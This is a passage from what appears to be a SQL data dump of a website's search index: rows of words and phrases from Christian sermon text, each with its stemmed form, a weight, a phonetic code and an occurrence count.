(92219, 'he does not', 'he does not', 0, 1, 1.3667, 'H3253', 3, '*'),
(92222, 'he had', 'he had', 0, 1, 1.2, 'H300', 9, '*'),
(92227, 'he wants', 'he wants', 0, 1, 1.2667, 'H532', 3, '*'),
(92228, 'he wants to', 'he wants to', 0, 1, 1.3667, 'H5323', 2, '*'),
(92229, 'he was', 'he was', 0, 1, 1.2, 'H200', 10, '*'),
(92230, 'he was the', 'he was the', 0, 1, 1.3333, 'H230', 4, '*'),
(92231, 'he will come', 'he will come', 0, 1, 1.4, 'H425', 2, '*'),
(92234, 'heavenly', 'heavenli', 0, 0, 0.5333, 'H154', 2, '*'),
(92241, 'his children', 'hi children', 0, 1, 1.4, 'H24365', 4, '*'),
(92250, 'his own', 'hi own', 0, 1, 1.2333, 'H250', 5, '*'),
(92258, 'how to be', 'how to be', 0, 1, 1.3, 'H310', 5, '*'),
(92263, 'in love', 'in love', 0, 1, 1.2333, 'I541', 2, '*'),
(92271, 'intercession', 'intercess', 0, 0, 0.8, 'I53625', 3, '*'),
(92277, 'intervention', 'intervent', 0, 0, 0.8, 'I5361535', 3, '*'),
(92280, 'intimacy', 'intimaci', 0, 0, 0.5333, 'I5352', 2, '*'),
(92281, 'intimacy with', 'intimaci with', 0, 1, 1.4333, 'I53523', 2, '*'),
(92282, 'intimacy with the', 'intimaci with the', 0, 1, 1.5667, 'I53523', 2, '*'),
(92289, 'is divine', 'is divine', 0, 1, 1.3, 'I2315', 2, '*'),
(92295, 'is looking', 'is looking', 0, 1, 1.3333, 'I24252', 4, '*'),
(92296, 'is looking for', 'is looking for', 0, 1, 1.4667, 'I2425216', 4, '*'),
(92305, 'is wisdom', 'is wisdom', 0, 1, 1.3, 'I235', 2, '*'),
(92310, 'israelites', 'israelit', 0, 0, 0.6667, 'I26432', 2, '*'),
(92313, 'it a', 'it a', 0, 1, 1.1333, 'I300', 3, '*'),
(92315, 'it is your', 'it is your', 0, 1, 1.3333, 'I326', 7, '*'),
(92316, 'it must', 'it must', 0, 1, 1.2333, 'I3523', 2, '*'),
(92317, 'it must be', 'it must be', 0, 1, 1.3333, 'I35231', 2, '*'),
(92319, 'it the', 'it the', 0, 1, 1.2, 'I300', 4, '*'),
(92325, 'it\'s the', 'it the', 0, 1, 1.2667, 'I323', 2, '*'),
(92329, 'its', 'it', 0, 0, 0.2, 'I320', 3, '*'),
(92338, 'john 15', 'john 15', 0, 1, 1.2333, 'J500', 2, '*'),
(92342, 'judge', 'judg', 0, 0, 0.3333, 'J320', 6, '*'),
(92351, 'kind of love', 'kind of love', 0, 1, 1.4, 'K53141', 2, '*'),
(92364, 'labour', 'labour', 0, 0, 0.4, 'L160', 3, '*'),
(92372, 'leader', 'leader', 0, 0, 0.4, 'L360', 6, '*'),
(92377, 'leading', 'lead', 0, 0, 0.4667, 'L352', 2, '*'),
(92380, 'leaves', 'leav', 0, 0, 0.4, 'L120', 2, '*'),
(92383, 'led', 'led', 0, 0, 0.2, 'L300', 3, '*'),
(92388, 'life and the', 'life and the', 0, 1, 1.4, 'L153', 2, '*'),
(92389, 'looking for', 'look for', 0, 1, 1.3667, 'L25216', 5, '*'),
(92393, 'lord is', 'lord is', 0, 1, 1.2333, 'L632', 5, '*'),
(92395, 'lord whenever', 'lord whenever', 0, 1, 1.4333, 'L63516', 2, '*'),
(92399, 'love that', 'love that', 0, 1, 1.3, 'L130', 2, '*'),
(92405, 'luke 19', 'luke 19', 0, 1, 1.2333, 'L200', 2, '*'),
(92414, 'material', 'materi', 0, 0, 0.5333, 'M364', 2, '*'),
(92421, 'may you not', 'mai you not', 0, 1, 1.3667, 'M300', 3, '*'),
(92422, 'membership', 'membership', 0, 0, 0.6667, 'M1621', 2, '*'),
(92459, 'not disappoint', 'not disappoint', 0, 1, 1.4667, 'N32153', 3, '*'),
(92466, 'not only', 'not only', 0, 1, 1.2667, 'N354', 4, '*'),
(92468, 'not want', 'not want', 0, 1, 1.2667, 'N353', 2, '*'),
(92472, 'nothing to', 'noth to', 0, 1, 1.3333, 'N3523', 3, '*'),
(92489, 'of intercession', 'of intercession', 0, 1, 1.5, 'O153625', 2, '*'),
(92491, 'of israel', 'of israel', 0, 1, 1.3, 'O1264', 3, '*'),
(92494, 'of love', 'of love', 0, 1, 1.2333, 'O141', 3, '*'),
(92511, 'only the', 'onli the', 0, 1, 1.2667, 'O543', 2, '*'),
(92515, 'out and', 'out and', 0, 1, 1.2333, 'O353', 4, '*'),
(92520, 'over them', 'over them', 0, 1, 1.3, 'O1635', 2, '*'),
(92529, 'pleasure', 'pleasur', 0, 0, 0.5333, 'P426', 3, '*'),
(92530, 'pleasure of', 'pleasur of', 0, 1, 1.3667, 'P4261', 2, '*'),
(92535, 'potential', 'potenti', 0, 0, 0.6, 'P3534', 2, '*'),
(92543, 'prayers', 'prayer', 0, 0, 0.4667, 'P620', 4, '*'),
(92551, 'produce', 'produc', 0, 0, 0.4667, 'P632', 4, '*'),
(92562, 'purpose', 'purpos', 0, 0, 0.4667, 'P612', 9, '*'),
(92571, 'received', 'receiv', 0, 0, 0.5333, 'R213', 4, '*'),
(92597, 'rewards', 'reward', 0, 0, 0.4667, 'R320', 3, '*'),
(92619, 'saul because', 'saul because', 0, 1, 1.4, 'S412', 2, '*'),
(92633, 'servants', 'servant', 0, 0, 0.5333, 'S61532', 5, '*'),
(92638, 'should not', 'should not', 0, 1, 1.3333, 'S4353', 3, '*'),
(92654, 'souls', 'soul', 0, 0, 0.3333, 'S420', 5, '*'),
(92673, 'sure that', 'sure that', 0, 1, 1.3, 'S630', 3, '*'),
(92674, 'sure that you', 'sure that you', 0, 1, 1.4333, 'S630', 2, '*'),
(92679, 'temple', 'templ', 0, 0, 0.4, 'T514', 2, '*'),
(92686, 'that bring', 'that bring', 0, 1, 1.3333, 'T1652', 2, '*'),
(92698, 'that led', 'that led', 0, 1, 1.2667, 'T430', 2, '*'),
(92703, 'that you\'re', 'that you', 0, 1, 1.3667, 'T600', 2, '*'),
(92708, 'the body', 'the body', 0, 1, 1.2667, 'T130', 2, '*'),
(92710, 'the capacity', 'the capacity', 0, 1, 1.4, 'T2123', 5, '*'),
(92725, 'the leader', 'the leader', 0, 1, 1.3333, 'T436', 2, '*'),
(92727, 'the life', 'the life', 0, 1, 1.2667, 'T410', 10, '*'),
(92729, 'the life and', 'the life and', 0, 1, 1.4, 'T4153', 2, '*'),
(92731, 'the lord is', 'the lord is', 0, 1, 1.3667, 'T4632', 5, '*'),
(92732, 'the lord whenever', 'the lord whenever', 0, 1, 1.5667, 'T463516', 2, '*'),
(92737, 'the pleasure', 'the pleasure', 0, 1, 1.4, 'T1426', 2, '*'),
(92738, 'the pleasure of', 'the pleasure of', 0, 1, 1.5, 'T14261', 2, '*'),
(92749, 'the temple', 'the temple', 0, 1, 1.3333, 'T514', 2, '*'),
(92763, 'the works', 'the works', 0, 1, 1.3, 'T620', 2, '*'),
(92764, 'the works of', 'the works of', 0, 1, 1.4, 'T621', 2, '*'),
(92780, 'there is an', 'there is an', 0, 1, 1.3667, 'T625', 4, '*'),
(92785, 'they have', 'thei have', 0, 1, 1.3, 'T100', 8, '*'),
(92789, 'this will', 'thi will', 0, 1, 1.3, 'T240', 5, '*'),
(92791, 'those who', 'those who', 0, 1, 1.3, 'T200', 3, '*'),
(92793, 'throne', 'throne', 0, 0, 0.4, 'T650', 3, '*'),
(92798, 'time will', 'time will', 0, 1, 1.3, 'T540', 3, '*'),
(92800, 'time with', 'time with', 0, 1, 1.3, 'T530', 3, '*'),
(92802, 'timing', 'time', 0, 0, 0.4, 'T520', 2, '*'),
(92805, 'title but', 'titl but', 0, 1, 1.3, 'T413', 2, '*'),
(92807, 'to approach', 'to approach', 0, 1, 1.3667, 'T162', 2, '*'),
(92809, 'to be a', 'to be a', 0, 1, 1.2333, 'T100', 11, '*'),
(92810, 'to bring', 'to bring', 0, 1, 1.2667, 'T1652', 6, '*'),
(92812, 'to bring forth', 'to bring forth', 0, 1, 1.4667, 'T1652163', 3, '*'),
(92813, 'to carry', 'to carry', 0, 1, 1.2667, 'T260', 2, '*'),
(92821, 'to god\'s', 'to god', 0, 1, 1.2667, 'T232', 4, '*'),
(92824, 'to judge', 'to judge', 0, 1, 1.2667, 'T232', 2, '*'),
(92828, 'to pray', 'to pray', 0, 1, 1.2333, 'T160', 7, '*'),
(92838, 'to their', 'to their', 0, 1, 1.2667, 'T600', 4, '*'),
(92842, 'today is', 'todai is', 0, 1, 1.2667, 'T200', 2, '*'),
(92844, 'took', 'took', 0, 0, 0.2667, 'T200', 6, '*'),
(92849, 'tree', 'tree', 0, 0, 0.2667, 'T600', 2, '*'),
(92852, 'trust', 'trust', 0, 0, 0.3333, 'T623', 5, '*'),
(92853, 'trust in', 'trust in', 0, 1, 1.2667, 'T6235', 3, '*'),
(92861, 'unto the', 'unto the', 0, 1, 1.2667, 'U530', 6, '*'),
(92865, 'vine', 'vine', 0, 0, 0.2667, 'V500', 2, '*'),
(92869, 'wanting', 'want', 0, 0, 0.4667, 'W5352', 4, '*'),
(92872, 'wants to', 'want to', 0, 1, 1.2667, 'W5323', 5, '*'),
(92882, 'was the', 'wa the', 0, 1, 1.2333, 'W230', 7, '*'),
(92886, 'wasting', 'wast', 0, 0, 0.4667, 'W2352', 2, '*'),
(92914, 'wicked', 'wick', 0, 0, 0.4, 'W230', 2, '*'),
(92927, 'wisdom', 'wisdom', 0, 0, 0.4, 'W235', 5, '*'),
(92940, 'with the father', 'with the father', 0, 1, 1.5, 'W3136', 3, '*'),
(92946, 'work for', 'work for', 0, 1, 1.2667, 'W6216', 2, '*'),
(92949, 'yield', 'yield', 0, 0, 0.3333, 'Y430', 3, '*'),
(92955, 'you as', 'you as', 0, 1, 1.2, 'Y200', 5, '*'),
(92964, 'you must be', 'you must be', 0, 1, 1.3667, 'Y5231', 5, '*'),
(92965, 'you not', 'you not', 0, 1, 1.2333, 'Y530', 5, '*'),
(92971, 'your church', 'your church', 0, 1, 1.3667, 'Y6262', 2, '*'),
(92972, 'your church membership', 'your church membership', 0, 1, 1.7333, 'Y626251621', 2, '*'),
(92980, 'your time with', 'your time with', 0, 1, 1.4667, 'Y6353', 2, '*'),
(99752, '1 corinthians', '1 corinthians', 0, 1, 1.4333, 'C65352', 2, '*'),
(99761, '12 1-2', '12 1-2', 0, 1, 1.2, '', 3, '*'),
(99764, '15-18', '15-18', 0, 0, 0.5, '', 2, '*'),
(99767, '16 15-18', '16 15-18', 0, 1, 1.2667, '', 2, '*'),
(99777, '19-20', '19-20', 0, 0, 0.5, '', 4, '*'),
(99778, '19-20 and', '19-20 and', 0, 1, 1.3, 'A530', 2, '*'),
(99779, '19-20 and mark', '19-20 and mark', 0, 1, 1.4667, 'A53562', 2, '*'),
(99780, '2 corinthians', '2 corinthians', 0, 1, 1.4333, 'C65352', 2, '*'),
(99782, '26-27', '26-27', 0, 0, 0.5, '', 2, '*'),
(99785, '28 19-20', '28 19-20', 0, 1, 1.2667, '', 2, '*'),
(99786, '28 19-20 and', '28 19-20 and', 0, 1, 1.4, 'A530', 2, '*'),
(99789, '3 17', '3 17', 0, 1, 1.1333, '', 2, '*'),
(99796, 'a christian is', 'a christian is', 0, 1, 1.4667, 'A262352', 2, '*'),
(99797, 'a christian that', 'a christian that', 0, 1, 1.5333, 'A262353', 2, '*'),
(99798, 'a clear', 'a clear', 0, 1, 1.2333, 'A246', 2, '*'),
(99799, 'a clear demarcation', 'a clear demarcation', 0, 1, 1.6333, 'A246356235', 2, '*'),
(99801, 'a correct', 'a correct', 0, 1, 1.3, 'A2623', 3, '*'),
(99802, 'a correct christian', 'a correct christian', 0, 1, 1.6333, 'A262326235', 3, '*'),
(99809, 'a look', 'a look', 0, 1, 1.2, 'A420', 3, '*'),
(99810, 'a look at', 'a look at', 0, 1, 1.3, 'A423', 3, '*'),
(99813, 'a minister', 'a minister', 0, 1, 1.3333, 'A5236', 2, '*'),
(99817, 'a place of', 'a place of', 0, 1, 1.3333, 'A1421', 4, '*'),
(99822, 'a soldier', 'a soldier', 0, 1, 1.3, 'A2436', 2, '*'),
(99828, 'a strong', 'a strong', 0, 1, 1.2667, 'A23652', 4, '*'),
(99832, 'a tool', 'a tool', 0, 1, 1.2, 'A340', 2, '*'),
(99834, 'a very', 'a very', 0, 1, 1.2, 'A160', 6, '*'),
(99836, 'a very powerful', 'a very powerful', 0, 1, 1.5, 'A161614', 2, '*'),
(99837, 'a world', 'a world', 0, 1, 1.2333, 'A643', 4, '*'),
(99838, 'a world of', 'a world of', 0, 1, 1.3333, 'A6431', 3, '*'),
(99851, 'account', 'account', 0, 0, 0.4667, 'A253', 4, '*'),
(99856, 'added', 'ad', 0, 0, 0.3333, 'A300', 5, '*'),
(99879, 'already', 'alreadi', 0, 0, 0.4667, 'A463', 5, '*'),
(99882, 'also you', 'also you', 0, 1, 1.2667, 'A420', 3, '*'),
(99883, 'also you must', 'also you must', 0, 1, 1.4333, 'A42523', 2, '*'),
(99888, 'and as', 'and as', 0, 1, 1.2, 'A532', 6, '*'),
(99889, 'and as christians', 'and as christians', 0, 1, 1.5667, 'A53262352', 2, '*'),
(99905, 'and how', 'and how', 0, 1, 1.2333, 'A530', 6, '*'),
(99906, 'and how to', 'and how to', 0, 1, 1.3333, 'A530', 3, '*'),
(99907, 'and if', 'and if', 0, 1, 1.2, 'A531', 2, '*'),
(99911, 'and mark', 'and mark', 0, 1, 1.2667, 'A53562', 2, '*'),
(99912, 'and mark 16', 'and mark 16', 0, 1, 1.3667, 'A53562', 2, '*'),
(99913, 'and mixtures', 'and mixtures', 0, 1, 1.4, 'A5352362', 3, '*'),
(99914, 'and mixtures part', 'and mixtures part', 0, 1, 1.5667, 'A5352362163', 3, '*'),
(99915, 'and new', 'and new', 0, 1, 1.2333, 'A535', 2, '*'),
(99921, 'and put', 'and put', 0, 1, 1.2333, 'A5313', 4, '*'),
(99926, 'and strong', 'and strong', 0, 1, 1.3333, 'A5323652', 3, '*'),
(99932, 'and the rest', 'and the rest', 0, 1, 1.4, 'A53623', 2, '*'),
(99935, 'and they', 'and they', 0, 1, 1.2667, 'A530', 9, '*'),
(99941, 'and we', 'and we', 0, 1, 1.2, 'A530', 5, '*'),
(99943, 'and you must', 'and you must', 0, 1, 1.4, 'A53523', 11, '*'),
(99949, 'anymore', 'anymor', 0, 0, 0.4667, 'A560', 3, '*'),
(99952, 'anywhere', 'anywher', 0, 0, 0.5333, 'A560', 2, '*'),
(99959, 'are going through', 'ar going through', 0, 1, 1.5667, 'A6252362', 5, '*'),
(99960, 'are his', 'ar his', 0, 1, 1.2333, 'A620', 2, '*'),
(99968, 'are to', 'ar to', 0, 1, 1.2, 'A630', 4, '*'),
(99969, 'are to be', 'ar to be', 0, 1, 1.3, 'A631', 2, '*'),
(99970, 'are too', 'ar too', 0, 1, 1.2333, 'A630', 3, '*'),
(99972, 'area', 'area', 0, 0, 0.2667, 'A600', 3, '*'),
(99977, 'art', 'art', 0, 0, 0.2, 'A630', 2, '*'),
(99980, 'as a christian', 'as a christian', 0, 1, 1.4667, 'A26235', 4, '*'),
(99984, 'as christians', 'as christians', 0, 1, 1.4333, 'A262352', 3, '*'),
(99986, 'assignment in', 'assign in', 0, 1, 1.4333, 'A2535', 3, '*'),
(100012, 'basic', 'basic', 0, 0, 0.3333, 'B200', 2, '*'),
(100015, 'be a correct', 'be a correct', 0, 1, 1.4, 'B2623', 3, '*'),
(100025, 'become a', 'becom a', 0, 1, 1.2667, 'B250', 8, '*'),
(100043, 'between most', 'between most', 0, 1, 1.4, 'B3523', 2, '*'),
(100044, 'between most christians', 'between most christians', 0, 1, 1.7667, 'B3523262352', 2, '*'),
(100058, 'boast', 'boast', 0, 0, 0.3333, 'B230', 2, '*'),
(100062, 'but it', 'but it', 0, 1, 1.2, 'B300', 7, '*'),
(100068, 'called christians', 'call christians', 0, 1, 1.5667, 'C43262352', 2, '*'),
(100079, 'career', 'career', 0, 0, 0.4, 'C600', 2, '*'),
(100092, 'chapter', 'chapter', 0, 0, 0.4667, 'C136', 2, '*'),
(100097, 'christian and how', 'christian and how', 0, 1, 1.5667, 'C62353', 2, '*'),
(100100, 'christian in a', 'christian in a', 0, 1, 1.4667, 'C6235', 3, '*'),
(100101, 'christian is', 'christian is', 0, 1, 1.4, 'C62352', 3, '*'),
(100103, 'christian must', 'christian must', 0, 1, 1.4667, 'C623523', 4, '*'),
(100105, 'christian that', 'christian that', 0, 1, 1.4667, 'C62353', 3, '*'),
(100107, 'christianity', 'christian', 0, 0, 0.8, 'C62353', 4, '*'),
(100114, 'christians and', 'christian and', 0, 1, 1.4667, 'C6235253', 2, '*'),
(100116, 'christians and the', 'christian and the', 0, 1, 1.6, 'C6235253', 2, '*'),
(100121, 'christians have', 'christian have', 0, 1, 1.5, 'C623521', 3, '*'),
(100125, 'christians to', 'christian to', 0, 1, 1.4333, 'C623523', 3, '*'),
(100127, 'christians today', 'christian today', 0, 1, 1.5333, 'C623523', 2, '*'),
(100132, 'christians who', 'christian who', 0, 1, 1.4667, 'C62352', 2, '*'),
(100139, 'church on', 'church on', 0, 1, 1.3, 'C625', 2, '*'),
(100143, 'church the', 'church the', 0, 1, 1.3333, 'C623', 3, '*'),
(100144, 'church the dream', 'church the dream', 0, 1, 1.5333, 'C62365', 3, '*'),
(100150, 'clear', 'clear', 0, 0, 0.3333, 'C460', 3, '*'),
(100151, 'clear demarcation', 'clear demarcation', 0, 1, 1.5667, 'C46356235', 2, '*'),
(100152, 'clear demarcation between', 'clear demarcation between', 0, 1, 1.8333, 'C46356235135', 2, '*'),
(100155, 'clearly', 'clearli', 0, 0, 0.4667, 'C464', 2, '*'),
(100163, 'comes out', 'come out', 0, 1, 1.3, 'C523', 2, '*'),
(100164, 'comes out of', 'come out of', 0, 1, 1.4, 'C5231', 2, '*'),
(100168, 'commandments', 'command', 0, 0, 0.8, 'C53532', 2, '*'),
(100175, 'commission', 'commiss', 0, 0, 0.6667, 'C525', 3, '*'),
(100185, 'confidence that', 'confid that', 0, 1, 1.5, 'C513523', 2, '*'),
(100187, 'confused', 'confus', 0, 0, 0.5333, 'C5123', 2, '*'),
(100195, 'corinthians', 'corinthian', 0, 0, 0.7333, 'C65352', 3, '*'),
(100200, 'correct', 'correct', 0, 0, 0.4667, 'C623', 8, '*'),
(100201, 'correct christian', 'correct christian', 0, 1, 1.5667, 'C62326235', 3, '*'),
(100202, 'correct christian in', 'correct christian in', 0, 1, 1.6667, 'C62326235', 3, '*'),
(100206, 'danger', 'danger', 0, 0, 0.4, 'D526', 4, '*'),
(100207, 'danger of', 'danger of', 0, 1, 1.3, 'D5261', 3, '*'),
(100209, 'darkness', 'dark', 0, 0, 0.5333, 'D6252', 3, '*'),
(100220, 'demarcation', 'demarc', 0, 0, 0.7333, 'D56235', 2, '*'),
(100221, 'demarcation between', 'demarc between', 0, 1, 1.6333, 'D56235135', 2, '*'),
(100222, 'demarcation between most', 'demarc between most', 0, 1, 1.8, 'D5623513523', 2, '*'),
(100228, 'destruction', 'destruct', 0, 0, 0.7333, 'D236235', 3, '*'),
(100231, 'determined', 'determin', 0, 0, 0.6667, 'D653', 2, '*'),
(100232, 'determined by', 'determin by', 0, 1, 1.4333, 'D6531', 2, '*'),
(100234, 'develop your', 'develop your', 0, 1, 1.4, 'D1416', 3, '*'),
(100235, 'develop your faith', 'develop your faith', 0, 1, 1.6, 'D141613', 2, '*'),
(100247, 'direct', 'direct', 0, 0, 0.4, 'D623', 2, '*'),
(100261, 'doesn\'t know', 'doesn know', 0, 1, 1.4, 'D25325', 2, '*'),
(100275, 'drink', 'drink', 0, 0, 0.3333, 'D652', 2, '*'),
(100278, 'driven', 'driven', 0, 0, 0.4, 'D615', 4, '*'),
(100281, 'duties', 'duti', 0, 0, 0.4, 'D200', 4, '*'),
(100291, 'effectively', 'effect', 0, 0, 0.7333, 'E12314', 3, '*'),
(100300, 'empowered', 'empow', 0, 0, 0.6, 'E5163', 2, '*'),
(100324, 'every christian', 'everi christian', 0, 1, 1.5, 'E1626235', 4, '*'),
(100325, 'every christian must', 'everi christian must', 0, 1, 1.6667, 'E162623523', 2, '*'),
(100327, 'exists', 'exist', 0, 0, 0.4, 'E232', 2, '*'),
(100328, 'exists a', 'exist a', 0, 1, 1.2667, 'E232', 2, '*'),
(100329, 'exists a clear', 'exist a clear', 0, 1, 1.4667, 'E23246', 2, '*'),
(100333, 'facing', 'face', 0, 0, 0.4, 'F252', 2, '*'),
(100336, 'fail', 'fail', 0, 0, 0.2667, 'F400', 6, '*'),
(100352, 'find yourself', 'find yourself', 0, 1, 1.4333, 'F536241', 4, '*'),
(100373, 'for them', 'for them', 0, 1, 1.2667, 'F635', 3, '*'),
(100374, 'for them to', 'for them to', 0, 1, 1.3667, 'F6353', 3, '*'),
(100386, 'generation', 'gener', 0, 0, 0.6667, 'G5635', 3, '*'),
(100390, 'given to', 'given to', 0, 1, 1.2667, 'G153', 4, '*'),
(100391, 'given to us', 'given to us', 0, 1, 1.3667, 'G1532', 3, '*'),
(100393, 'gives the', 'give the', 0, 1, 1.3, 'G123', 2, '*'),
(100398, 'god and your', 'god and your', 0, 1, 1.4, 'G3536', 2, '*'),
(100401, 'god in your', 'god in your', 0, 1, 1.3667, 'G356', 2, '*'),
(100409, 'going through', 'go through', 0, 1, 1.4333, 'G52362', 5, '*'),
(100412, 'gospel to', 'gospel to', 0, 1, 1.3, 'G143', 2, '*'),
(100431, 'happens', 'happen', 0, 0, 0.4667, 'H152', 7, '*'),
(100436, 'has to', 'ha to', 0, 1, 1.2, 'H230', 3, '*'),
(100442, 'have become', 'have become', 0, 1, 1.3667, 'H125', 3, '*'),
(100445, 'have been', 'have been', 0, 1, 1.3, 'H150', 6, '*'),
(100457, 'here are', 'here are', 0, 1, 1.2667, 'H600', 3, '*'),
(100458, 'here are some', 'here are some', 0, 1, 1.4333, 'H625', 2, '*'),
(100461, 'him out', 'him out', 0, 1, 1.2333, 'H530', 2, '*'),
(100466, 'his name', 'hi name', 0, 1, 1.2667, 'H250', 3, '*'),
(100474, 'holy spirit room', 'holi spirit room', 0, 1, 1.5333, 'H4216365', 2, '*'),
(100475, 'holy spirit to', 'holi spirit to', 0, 1, 1.4667, 'H42163', 4, '*'),
(100487, 'how well', 'how well', 0, 1, 1.2667, 'H400', 2, '*'),
(100488, 'how well you', 'how well you', 0, 1, 1.4, 'H400', 2, '*'),
(100491, 'however the', 'howev the', 0, 1, 1.3667, 'H163', 4, '*'),
(100508, 'ignorance', 'ignor', 0, 0, 0.6, 'I25652', 2, '*'),
(100514, 'important', 'import', 0, 0, 0.6, 'I516353', 6, '*'),
(100517, 'in a world', 'in a world', 0, 1, 1.3333, 'I5643', 4, '*'),
(100521, 'in god and', 'in god and', 0, 1, 1.3333, 'I52353', 3, '*'),
(100533, 'in order', 'in order', 0, 1, 1.2667, 'I5636', 4, '*'),
(100534, 'in order to', 'in order to', 0, 1, 1.3667, 'I56363', 4, '*'),
(100535, 'in the bible', 'in the bible', 0, 1, 1.4, 'I5314', 5, '*'),
(100546, 'include', 'includ', 0, 0, 0.4667, 'I5243', 2, '*'),
(100556, 'into a', 'into a', 0, 1, 1.2, 'I530', 5, '*'),
(100560, 'is a very', 'is a very', 0, 1, 1.3, 'I216', 3, '*'),
(100567, 'is directly', 'is directly', 0, 1, 1.3667, 'I236234', 2, '*'),
(100569, 'is important', 'is important', 0, 1, 1.4, 'I2516353', 2, '*'),
(100571, 'is like', 'is like', 0, 1, 1.2333, 'I242', 2, '*'),
(100572, 'is like a', 'is like a', 0, 1, 1.3, 'I242', 2, '*'),
(100576, 'is to', 'is to', 0, 1, 1.1667, 'I230', 11, '*'),
(100582, 'it doesn\'t', 'it doesn', 0, 1, 1.3333, 'I3253', 4, '*'),
(100591, 'it has', 'it has', 0, 1, 1.2, 'I320', 2, '*'),
(100595, 'it shall', 'it shall', 0, 1, 1.2667, 'I324', 7, '*'),
(100609, 'kill', 'kill', 0, 0, 0.2667, 'K400', 2, '*'),
(100613, 'know how', 'know how', 0, 1, 1.2667, 'K500', 6, '*'),
(100614, 'know how to', 'know how to', 0, 1, 1.3667, 'K530', 4, '*'),
(100617, 'know what', 'know what', 0, 1, 1.3, 'K530', 3, '*'),
(100637, 'like this', 'like this', 0, 1, 1.3, 'L232', 2, '*'),
(100642, 'long time', 'long time', 0, 1, 1.3, 'L5235', 2, '*'),
(100644, 'longer', 'longer', 0, 0, 0.4, 'L526', 5, '*'),
(100645, 'longer exists', 'longer exists', 0, 1, 1.4333, 'L526232', 2, '*'),
(100646, 'longer exists a', 'longer exists a', 0, 1, 1.5, 'L526232', 2, '*'),
(100647, 'look', 'look', 0, 0, 0.2667, 'L200', 7, '*'),
(100648, 'look at', 'look at', 0, 1, 1.2333, 'L230', 7, '*'),
(100649, 'look at the', 'look at the', 0, 1, 1.3667, 'L230', 2, '*'),
(100655, 'lukewarm', 'lukewarm', 0, 0, 0.5333, 'L265', 2, '*'),
(100660, 'many a', 'mani a', 0, 1, 1.2, 'M000', 2, '*'),
(100664, 'mark 16', 'mark 16', 0, 1, 1.2333, 'M620', 2, '*'),
(100665, 'mark 16 15-18', 'mark 16 15-18', 0, 1, 1.4333, 'M620', 2, '*'),
(100673, 'matthew 28', 'matthew 28', 0, 1, 1.3333, 'M300', 2, '*'),
(100674, 'matthew 28 19-20', 'matthew 28 19-20', 0, 1, 1.5333, 'M300', 2, '*'),
(100680, 'means you', 'mean you', 0, 1, 1.3, 'M200', 5, '*'),
(100693, 'miracles', 'miracl', 0, 0, 0.5333, 'M6242', 3, '*'),
(100699, 'mixtures', 'mixtur', 0, 0, 0.5333, 'M2362', 3, '*'),
(100700, 'mixtures part', 'mixtur part', 0, 1, 1.4333, 'M2362163', 3, '*'),
(100708, 'most christians', 'most christians', 0, 1, 1.5, 'M23262352', 2, '*'),
(100709, 'most christians and', 'most christians and', 0, 1, 1.6333, 'M2326235253', 2, '*'),
(100713, 'must be able', 'must be able', 0, 1, 1.4, 'M2314', 3, '*'),
(100715, 'must become', 'must become', 0, 1, 1.3667, 'M23125', 3, '*'),
(100716, 'must become a', 'must become a', 0, 1, 1.4333, 'M23125', 3, '*'),
(100720, 'must not', 'must not', 0, 1, 1.2667, 'M2353', 4, '*'),
(100724, 'name and', 'name and', 0, 1, 1.2667, 'N300', 3, '*'),
(100751, 'no longer', 'no longer', 0, 1, 1.3, 'N4526', 4, '*'),
(100752, 'no longer exists', 'no longer exists', 0, 1, 1.5333, 'N4526232', 2, '*'),
(100755, 'not be able', 'not be able', 0, 1, 1.3667, 'N314', 2, '*'),
(100756, 'not fail', 'not fail', 0, 1, 1.2667, 'N314', 2, '*'),
(100762, 'now that', 'now that', 0, 1, 1.2667, 'N300', 2, '*'),
(100767, 'observe', 'observ', 0, 0, 0.4667, 'O1261', 2, '*'),
(100774, 'of an', 'of an', 0, 1, 1.1667, 'O150', 3, '*'),
(100781, 'of christians today', 'of christians today', 0, 1, 1.6333, 'O12623523', 2, '*'),
(100784, 'of faith and', 'of faith and', 0, 1, 1.4, 'O1353', 2, '*'),
(100788, 'of pollution', 'of pollution', 0, 1, 1.4, 'O1435', 3, '*'),
(100789, 'of pollution and', 'of pollution and', 0, 1, 1.5333, 'O14353', 3, '*'),
(100793, 'of the enemy', 'of the enemy', 0, 1, 1.4, 'O135', 2, '*'),
(100799, 'of the world', 'of the world', 0, 1, 1.4, 'O13643', 4, '*'),
(100800, 'of this', 'of this', 0, 1, 1.2333, 'O132', 7, '*'),
(100816, 'one thing', 'on thing', 0, 1, 1.3, 'O5352', 3, '*'),
(100822, 'operations', 'oper', 0, 0, 0.6667, 'O16352', 3, '*'),
(100833, 'order', 'order', 0, 0, 0.3333, 'O636', 6, '*'),
(100834, 'order to', 'order to', 0, 1, 1.2667, 'O6363', 4, '*'),
(100845, 'out the', 'out the', 0, 1, 1.2333, 'O300', 3, '*'),
(100849, 'pass', 'pass', 0, 0, 0.2667, 'P200', 5, '*'),
(100874, 'plague', 'plagu', 0, 0, 0.4, 'P420', 3, '*'),
(100875, 'plague today\'s', 'plagu today', 0, 1, 1.4667, 'P4232', 2, '*'),
(100877, 'point', 'point', 0, 0, 0.3333, 'P530', 7, '*'),
(100878, 'point is', 'point is', 0, 1, 1.2667, 'P532', 2, '*'),
(100879, 'point is one', 'point is one', 0, 1, 1.4, 'P5325', 2, '*'),
(100884, 'pollution', 'pollut', 0, 0, 0.6, 'P435', 3, '*'),
(100885, 'pollution and', 'pollut and', 0, 1, 1.4333, 'P4353', 3, '*'),
(100886, 'pollution and mixtures', 'pollut and mixtures', 0, 1, 1.7333, 'P435352362', 3, '*'),
(100887, 'possessed', 'possess', 0, 0, 0.6, 'P230', 3, '*'),
(100890, 'powerful', 'power', 0, 0, 0.5333, 'P614', 3, '*'),
(100900, 'problems', 'problem', 0, 0, 0.5333, 'P61452', 9, '*'),
(100903, 'problems that', 'problem that', 0, 1, 1.4333, 'P614523', 2, '*'),
(100904, 'problems that plague', 'problem that plague', 0, 1, 1.6667, 'P614523142', 2, '*'),
(100909, 'properly', 'properli', 0, 0, 0.5333, 'P6164', 2, '*'),
(100920, 'put a', 'put a', 0, 1, 1.1667, 'P300', 2, '*'),
(100922, 'puts', 'put', 0, 0, 0.2667, 'P320', 2, '*'),
(100931, 'real', 'real', 0, 0, 0.2667, 'R400', 6, '*'),
(100934, 'realm of the', 'realm of the', 0, 1, 1.4, 'R4513', 2, '*'),
(100935, 'reason', 'reason', 0, 0, 0.4, 'R250', 9, '*'),
(100941, 'referring', 'refer', 0, 0, 0.6, 'R1652', 2, '*'),
(100942, 'referring to', 'refer to', 0, 1, 1.4, 'R16523', 2, '*'),
